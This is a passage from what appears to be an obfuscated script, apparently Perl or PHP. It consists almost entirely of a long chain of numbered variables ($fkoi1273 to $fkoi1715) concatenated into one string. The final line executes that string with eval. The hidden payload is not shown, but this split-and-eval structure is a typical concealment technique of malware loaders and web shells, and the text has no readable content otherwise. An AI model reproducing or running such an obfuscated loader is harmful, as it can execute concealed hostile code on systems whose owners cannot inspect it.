$fkoi1273.$fkoi1274.$fkoi1275.$fkoi1276.$fkoi1277.$fkoi1278.$fkoi1279.$fkoi1280.$fkoi1281.$fkoi1282.$fkoi1283.$fkoi1284.$fkoi1285.$fkoi1286.$fkoi1287.
$fkoi1288.$fkoi1289.$fkoi1290.$fkoi1291.$fkoi1292.$fkoi1293.$fkoi1294.$fkoi1295.$fkoi1296.
$fkoi1297.$fkoi1298.
$fkoi1299.$fkoi1300.$fkoi1301.$fkoi1302.$fkoi1303.$fkoi1304.
$fkoi1305.$fkoi1306.$fkoi1307.$fkoi1308.$fkoi1309.
$fkoi1310.$fkoi1311.
$fkoi1312.$fkoi1313.$fkoi1314.$fkoi1315.$fkoi1316.$fkoi1317.$fkoi1318.$fkoi1319.$fkoi1320.
$fkoi1321.
$fkoi1322.$fkoi1323.
$fkoi1324.$fkoi1325.$fkoi1326.$fkoi1327.$fkoi1328.$fkoi1329.$fkoi1330.$fkoi1331.$fkoi1332.$fkoi1333.$fkoi1334.$fkoi1335.$fkoi1336.
$fkoi1337.$fkoi1338.$fkoi1339.$fkoi1340.$fkoi1341.
$fkoi1342.$fkoi1343.$fkoi1344.
$fkoi1345.$fkoi1346.$fkoi1347.$fkoi1348.
$fkoi1349.$fkoi1350.$fkoi1351.$fkoi1352.$fkoi1353.$fkoi1354.$fkoi1355.$fkoi1356.$fkoi1357.$fkoi1358.
$fkoi1359.
$fkoi1360.
$fkoi1361.$fkoi1362.$fkoi1363.$fkoi1364.$fkoi1365.
$fkoi1366.$fkoi1367.$fkoi1368.
$fkoi1369.$fkoi1370.$fkoi1371.$fkoi1372.
$fkoi1373.$fkoi1374.$fkoi1375.
$fkoi1376.$fkoi1377.$fkoi1378.$fkoi1379.$fkoi1380.
$fkoi1381.$fkoi1382.$fkoi1383.
$fkoi1384.$fkoi1385.$fkoi1386.
$fkoi1387.$fkoi1388.$fkoi1389.$fkoi1390.$fkoi1391.$fkoi1392.$fkoi1393.$fkoi1394.$fkoi1395.
$fkoi1396.$fkoi1397.$fkoi1398.$fkoi1399.
$fkoi1400.
$fkoi1401.$fkoi1402.$fkoi1403.$fkoi1404.$fkoi1405.$fkoi1406.$fkoi1407.$fkoi1408.
$fkoi1409.$fkoi1410.$fkoi1411.$fkoi1412.$fkoi1413.$fkoi1414.$fkoi1415.$fkoi1416.$fkoi1417.
$fkoi1418.$fkoi1419.$fkoi1420.$fkoi1421.$fkoi1422.$fkoi1423.$fkoi1424.
$fkoi1425.$fkoi1426.$fkoi1427.
$fkoi1428.
$fkoi1429.
$fkoi1430.
$fkoi1431.$fkoi1432.
$fkoi1433.$fkoi1434.$fkoi1435.$fkoi1436.$fkoi1437.$fkoi1438.$fkoi1439.$fkoi1440.$fkoi1441.$fkoi1442.$fkoi1443.$fkoi1444.$fkoi1445.
$fkoi1446.$fkoi1447.$fkoi1448.$fkoi1449.
$fkoi1450.
$fkoi1451.$fkoi1452.
$fkoi1453.$fkoi1454.
$fkoi1455.$fkoi1456.
$fkoi1457.$fkoi1458.$fkoi1459.$fkoi1460.$fkoi1461.$fkoi1462.$fkoi1463.$fkoi1464.
$fkoi1465.$fkoi1466.
$fkoi1467.$fkoi1468.
$fkoi1469.$fkoi1470.$fkoi1471.
$fkoi1472.$fkoi1473.$fkoi1474.$fkoi1475.$fkoi1476.$fkoi1477.$fkoi1478.$fkoi1479.$fkoi1480.
$fkoi1481.$fkoi1482.$fkoi1483.$fkoi1484.$fkoi1485.$fkoi1486.$fkoi1487.$fkoi1488.$fkoi1489.$fkoi1490.$fkoi1491.$fkoi1492.$fkoi1493.$fkoi1494.
$fkoi1495.$fkoi1496.$fkoi1497.$fkoi1498.
$fkoi1499.$fkoi1500.$fkoi1501.$fkoi1502.$fkoi1503.$fkoi1504.$fkoi1505.$fkoi1506.$fkoi1507.$fkoi1508.$fkoi1509.$fkoi1510.$fkoi1511.$fkoi1512.
$fkoi1513.$fkoi1514.$fkoi1515.$fkoi1516.$fkoi1517.$fkoi1518.$fkoi1519.$fkoi1520.$fkoi1521.$fkoi1522.$fkoi1523.$fkoi1524.$fkoi1525.$fkoi1526.$fkoi1527.$fkoi1528.$fkoi1529.$fkoi1530.$fkoi1531.$fkoi1532.$fkoi1533.$fkoi1534.$fkoi1535.$fkoi1536.$fkoi1537.$fkoi1538.$fkoi1539.$fkoi1540.$fkoi1541.
$fkoi1542.$fkoi1543.$fkoi1544.$fkoi1545.$fkoi1546.$fkoi1547.$fkoi1548.$fkoi1549.$fkoi1550.$fkoi1551.$fkoi1552.$fkoi1553.$fkoi1554.$fkoi1555.$fkoi1556.$fkoi1557.$fkoi1558.$fkoi1559.$fkoi1560.$fkoi1561.$fkoi1562.$fkoi1563.$fkoi1564.$fkoi1565.$fkoi1566.
$fkoi1567.$fkoi1568.$fkoi1569.
$fkoi1570.$fkoi1571.$fkoi1572.$fkoi1573.$fkoi1574.$fkoi1575.$fkoi1576.$fkoi1577.$fkoi1578.$fkoi1579.$fkoi1580.$fkoi1581.$fkoi1582.$fkoi1583.$fkoi1584.$fkoi1585.
$fkoi1586.$fkoi1587.$fkoi1588.
$fkoi1589.$fkoi1590.
$fkoi1591.$fkoi1592.$fkoi1593.
$fkoi1594.$fkoi1595.
$fkoi1596.
$fkoi1597.$fkoi1598.
$fkoi1599.$fkoi1600.$fkoi1601.$fkoi1602.$fkoi1603.
$fkoi1604.$fkoi1605.$fkoi1606.$fkoi1607.$fkoi1608.$fkoi1609.$fkoi1610.$fkoi1611.$fkoi1612.
$fkoi1613.$fkoi1614.$fkoi1615.$fkoi1616.$fkoi1617.$fkoi1618.$fkoi1619.$fkoi1620.
$fkoi1621.$fkoi1622.$fkoi1623.$fkoi1624.$fkoi1625.$fkoi1626.$fkoi1627.$fkoi1628.$fkoi1629.$fkoi1630.$fkoi1631.$fkoi1632.$fkoi1633.$fkoi1634.$fkoi1635.$fkoi1636.$fkoi1637.$fkoi1638.
$fkoi1639.$fkoi1640.$fkoi1641.$fkoi1642.$fkoi1643.$fkoi1644.$fkoi1645.
$fkoi1646.$fkoi1647.$fkoi1648.$fkoi1649.$fkoi1650.
$fkoi1651.$fkoi1652.$fkoi1653.$fkoi1654.$fkoi1655.
$fkoi1656.
$fkoi1657.$fkoi1658.
$fkoi1659.$fkoi1660.$fkoi1661.$fkoi1662.
$fkoi1663.$fkoi1664.
$fkoi1665.$fkoi1666.$fkoi1667.$fkoi1668.
$fkoi1669.$fkoi1670.$fkoi1671.$fkoi1672.$fkoi1673.$fkoi1674.
$fkoi1675.$fkoi1676.$fkoi1677.
$fkoi1678.$fkoi1679.$fkoi1680.$fkoi1681.$fkoi1682.$fkoi1683.$fkoi1684.$fkoi1685.
$fkoi1686.
$fkoi1687.$fkoi1688.$fkoi1689.$fkoi1690.$fkoi1691.$fkoi1692.$fkoi1693.
$fkoi1694.
$fkoi1695.$fkoi1696.$fkoi1697.$fkoi1698.
$fkoi1699.$fkoi1700.
$fkoi1701.$fkoi1702.$fkoi1703.$fkoi1704.$fkoi1705.$fkoi1706.$fkoi1707.$fkoi1708.$fkoi1709.$fkoi1710.
$fkoi1711.$fkoi1712.$fkoi1713.$fkoi1714.$fkoi1715;$c='fkoi';eval $fkoi;